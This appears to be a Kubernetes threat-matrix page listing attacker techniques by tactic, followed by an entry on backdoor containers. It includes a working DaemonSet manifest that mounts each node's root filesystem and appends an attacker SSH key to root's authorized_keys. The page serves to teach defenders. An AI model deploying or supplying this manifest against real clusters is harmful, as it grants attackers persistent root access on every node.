Kubernetes Threat Matrix

Initial access	Execution	Persistence	Privilege escalation	Defense evasion	Credential access	Discovery	Lateral movement	Collection	Impact
Using Cloud	Exec into Container	Backdoor Container	Privileged Container	Clear Container Logs	List K8s secrets	Access the K8s API server	Access cloud resources	Images from a private repository	Data Destruction
Compromised images in registry	bash/cmd in container	Writable hostPath mount	Cluster-admin binding	Delete k8s events	Mount service principal	Access Kubelet API	Container service account		Ressource hijacking
Kubeconfig file	New container	Kubernetes CronJob	hostPath mount	Pod / container name similarity	Access container service account	Network mapping	Cluster internal networking		Denial of Service
Application vulnerability	Application exploit (RCE)	Malicious admission controller	Access cloud resources	Connect from proxy server	Applications credentials in configuration files	Access Kubernetes dashboard	Applications credentials in configuration files
Exposed sensitive interfaces	SSH server running in inside container		Disable Namespacing		Access managed identity credentials	Instance metadata API	Writable volume mounts on the host
	Sidecar injection				Malicious admission controller		CoreDNS poisoning
							ARP poisoning and IP spoofing

Initial access

Execution

Persistence

Privilege escalation

Defense evasion

Credential access

Discovery

Lateral movement

Collection

Impact

Access the K8s API server

Access cloud resources

Images from a private repository

Data Destruction

Compromised images in registry

bash/cmd in container

Writable hostPath mount

Cluster-admin binding

Delete k8s events

Mount service principal

Access Kubelet API

Container service account

Pod / container name similarity

Access container service account

Network mapping

Cluster internal networking

Denial of Service

Application vulnerability

Application exploit (RCE)

Malicious admission controller

Access cloud resources

Connect from proxy server

Applications credentials in configuration files

Access Kubernetes dashboard

Applications credentials in configuration files

Exposed sensitive interfaces

SSH server running in inside container

Disable Namespacing

Access managed identity credentials

Instance metadata API

Writable volume mounts on the host

Sidecar injection

Malicious admission controller

CoreDNS poisoning

ARP poisoning and IP spoofing

Backdoor Container

Attackers run their malicious code in a container in the cluster. By using the Kubernetes controllers such as DaemonSets or Deployments, attackers can ensure that a constant number of containers run in one, or all, the nodes in the cluster.

Example

One of the simplest and on the same time most efficient ways to deploy backdoor containers is the usage of a DaemonSet. The following adds the attacker’s SSH key to the authorized_keys file on every node in the cluster every 10 minutes (600 seconds). As a DaemonSet automatically makes sure to deploy a pod on each node, this means also newly added nodes will immediately be compromised when the become available.

apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: evil-daemonset
  labels:
    app: evil-daemonset
spec:
  selector:
    matchLabels:
      app: evil-daemonset
  template:
    metadata:
      labels:
        app: evil-daemonset
    spec:
      containers:
      - name: evil
        image: ubuntu
        command: [ "/bin/sh", "-c", "mkdir -p /host/root/.ssh && echo 'ssh-rsa AAAAB3NzaC1y...CUkwfwh+iSTP' >> /host/root/.ssh/authorized_keys && sleep 600" ]
        volumeMounts:
        - name: host
          mountPath: /host
      volumes:
      - name: host
        hostPath:
          path: /

Please note that this is a quick and dirty example only made for demonstration purposes and the authorized_keys file will be filled up over time.

References